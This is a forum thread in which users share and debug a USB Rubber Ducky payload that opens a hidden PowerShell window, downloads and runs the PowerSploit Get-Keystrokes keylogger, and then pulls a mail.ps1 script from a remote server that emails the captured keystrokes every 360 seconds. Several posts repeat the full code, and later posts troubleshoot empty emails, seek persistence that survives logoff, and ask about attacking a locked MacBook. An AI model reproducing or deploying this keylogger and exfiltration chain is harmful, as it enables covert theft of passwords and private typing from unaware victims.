GunZofPeace Posted February 5, 2017 Share Posted February 5, 2017 Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500 GUI r DELAY 50 STRING powershell -WindowStyle hidden ENTER DELAY 100 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 300 STRING Get-Keystrokes -LogPath C:\Users\Garrett\Desktop\testing123.txt -Timeout 1 ENTER Of course, go to the www.ducktoolkit.com and encode it. Comment any suggestions / thoughts! I will be posting more scripts as I go. Also, I am working on a script to email the keylog file to your email. Will upload once I get that working. Hope you enjoy! 1 Quote Link to comment Share on other sites More sharing options...
GunZofPeace Posted February 5, 2017 Author Share Posted February 5, 2017 Well yeah, yours has persistence and a lot of other parameters. Which is easily done through powershell! Mines a very simple and basic one! Great script by the way. 1 Quote Link to comment Share on other sites More sharing options...
Speed09 Posted March 3, 2017 Share Posted March 3, 2017 Nice script! I will give it a try. But to exfiltrate the log file you can make a simple ps script that email (or POST to a web server) every X minutes the content of the file. I'm not good at ps but I think it's possible. Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 8, 2017 Share Posted March 8, 2017 Would love to see this script have the ability to output the results via email. Quote Link to comment Share on other sites More sharing options...
Speed09 Posted March 8, 2017 Share Posted March 8, 2017 (edited) I'm not good at powershell at all, but I managed to get the exfiltrate working. I simply modified the payload to run a ps script from my server that will send me the log file via email. Here is the final ducky script: DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1') ENTER And here is the mail.ps1 content: $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'youradress@gmail.com' $ReportEmail.To.Add('youradress@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} Edited March 8, 2017 by Speed09 1 Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 8, 2017 Share Posted March 8, 2017 How often will the results of the keylogger be sent to your email? Quote Link to comment Share on other sites More sharing options...
Speed09 Posted March 8, 2017 Share Posted March 8, 2017 29 minutes ago, Mike Jamieson said: How often will the results of the keylogger be sent to your email? Every 360sec. But you can change it. Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 8, 2017 Share Posted March 8, 2017 Thank you. One last question, How would you disable this script? Quote Link to comment Share on other sites More sharing options...
Speed09 Posted March 8, 2017 Share Posted March 8, 2017 5 minutes ago, Mike Jamieson said: Thank you. One last question, How would you disable this script? By simply shutting down the computer. Since the script is loaded in memory, I also think that logout should kill it. Have a try! Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 8, 2017 Share Posted March 8, 2017 First off I want to thank you for providing educational content to the community. I purchased the USB runner ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See Below the IP address of my server which i changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSB into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well which obviously I changed myemail to my actual email@gmail.com with password. DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'myemail' $ReportEmail.To.Add('myemail') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} Any insight would be GREATLY appreciated. Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 9, 2017 Share Posted March 9, 2017 Does anyone else have any ducky keylogger scripts they would like to share? I sure wish Hak5 would produce a win10 ducky keylogger script with gmail/pastebin output results for the community! Quote Link to comment Share on other sites More sharing options...
henna3 Posted March 9, 2017 Share Posted March 9, 2017 21 hours ago, Mike Jamieson said: First off I want to thank you for providing educational content to the community. I purchased the USB runner ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See Below the IP address of my server which i changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSB into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well which obviously I changed myemail to my actual email@gmail.com with password. DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'myemail' $ReportEmail.To.Add('myemail') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} Any insight would be GREATLY appreciated. DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.log ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'myemail' $ReportEmail.To.Add('myemail') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360} I have absolutely no idea if this will fix the problem for you, but it worked for me. Simply changed the key.txt to key.log Hope it works for you too! Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 9, 2017 Share Posted March 9, 2017 Thank you so much for the response! I'll give this a try and report back. Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 9, 2017 Share Posted March 9, 2017 well I finally got it to work using the original script from Speed09! I'm ecstatic. I changed my web hosting to a free shared account (https://www.000webhost.com/) and it worked, I'm also noticing that I'm receiving results from hours ago which makes me believe it was working all along. Gmail was blocking the sign in from the script because it was viewed as a less secure app, and I finally got a notification to allow the sign in attempt. I'm noticing that the results appear in single character results which makes it very difficult to actually comprehend what is being typed. Do you use any tools to organize the results? Thank you so much for the help!! Just know you made someone's day and helped ignite my interest in security. Quote Link to comment Share on other sites More sharing options...
Speed09 Posted March 9, 2017 Share Posted March 9, 2017 39 minutes ago, Mike Jamieson said: well I finally got it to work using the original script from Speed09! I'm ecstatic. I changed my web hosting to a free shared account (https://www.000webhost.com/) and it worked, I'm also noticing that I'm receiving results from hours ago which makes me believe it was working all along. Gmail was blocking the sign in from the script because it was viewed as a less secure app, and I finally got a notification to allow the sign in attempt. I'm noticing that the results appear in single character results which makes it very difficult to actually comprehend what is being typed. Do you use any tools to organize the results? Thank you so much for the help!! Just know you made someone's day and helped ignite my interest in security. Yeah I forgot to mention that you'll have to turn on less secure app settings. For the results, it doesn't bother me much to view the results one character at a time. But if you want to view it online, feel free to change the script :) Quote Link to comment Share on other sites More sharing options...
Mike Jamieson Posted March 15, 2017 Share Posted March 15, 2017 Hey Guys, Does anyone have a persistent keylogger script that will still run regardless if the user logs off or shut's down their computer? Quote Link to comment Share on other sites More sharing options...
Anonymoose Posted October 17, 2017 Share Posted October 17, 2017 So I have most of this working but when it sends the emails, it is not updating the keylogger I am just getting the same thing back can anyone help? Quote Link to comment Share on other sites More sharing options...
AHoxha19 Posted January 16, 2018 Share Posted January 16, 2018 On 17/10/2017 at 2:43 AM, Anonymoose said: So I have most of this working but when it sends the emails, it is not updating the keylogger I am just getting the same thing back can anyone help? I have the same issue and don't know if you found the answer. Does anyone have a solution for this? Quote Link to comment Share on other sites More sharing options...
mrskannk Posted January 17, 2018 Share Posted January 17, 2018 i'm getting the same isue. I'm getting empty email with speed09's script Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted January 18, 2018 Share Posted January 18, 2018 Sold Ducky and use a BB but not that much difference and I follow on the forums where ever I see Powershell. So, looking at this script it is going to send the same attachment over again every 30 seconds just it may get bigger each time? You may want to rename log file, if keylogger is not locking it, then send it and then remove that copy so it is different each time. Or if you do not want to send the file itself still rename but get-content the contents of the file as the body of the email and send. Just some ideas. :-) Quote Link to comment Share on other sites More sharing options...
cryptolab Posted January 18, 2018 Share Posted January 18, 2018 ciao ragazzi, perche visualizzo questo errore? Quote Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C: \ Users \ crypt> IEX (New-Object Net.WebClient) .DownloadString ('http://nviia.altervista.org/mail.ps1') Exception during the "Send" call with "1" argument (s): "The SMTP server requires a secure connection or the client has not been authenticated. Server Response: 5.5.1 Authentication Required. Learn more at " In line: 9 car: 60 + ... chments.Add ("$ ENV: temp \ key.log"); $ SMTPInfo.Send ($ ReportEmail); sleep 3 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo: NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId: SmtpException Exception during the "Send" call with "1" argument (s): "The SMTP server requires a secure connection or the client has not been authenticated. Server Response: 5.5.1 Authentication Required. Learn more at " In line: 9 car: 60 + ... chments.Add ("$ ENV: temp \ key.log"); $ SMTPInfo.Send ($ ReportEmail); sleep 3 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo: NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId: SmtpException Exception during the "Send" call with "1" argument (s): "The SMTP server requires a secure connection or the client has not been authenticated. Server Response: 5.5.1 Authentication Required. Learn more at " In line: 9 car: 60 + ... chments.Add ("$ ENV: temp \ key.log"); $ SMTPInfo.Send ($ ReportEmail); sleep 3 ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo: NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId: SmtpException Quote Link to comment Share on other sites More sharing options...
mrskannk Posted March 3, 2018 Share Posted March 3, 2018 On 09/03/2017 at 7:53 PM, henna3 said: DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.log ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'myemail' $ReportEmail.To.Add('myemail') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360} I'm still getting empty emails with this . does any one see anything who could help :D Quote Link to comment Share on other sites More sharing options...
The Modern Mind Posted April 8, 2018 Share Posted April 8, 2018 I really wish I could get this to work. Emails arrive, they're just empty. Quote Link to comment Share on other sites More sharing options...
mrskannk Posted April 25, 2018 Share Posted April 25, 2018 On 3/8/2017 at 6:57 AM, Speed09 said: I'm still lokking for the solution. Same as " The modern Mind" : getting empty mails. does any one got a working script or know what's wrong whit the last one ? Quote Link to comment Share on other sites More sharing options...
DancinRick007 Posted April 26, 2018 Share Posted April 26, 2018 Hi Guys.. I am an absolute newby but I am interested in finding out whether you can execute an attack on a macbook pro for instance without knowing the start up password.. Can anyone tell me if that is possible or do you have to know the log on details before any attempt is made..? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.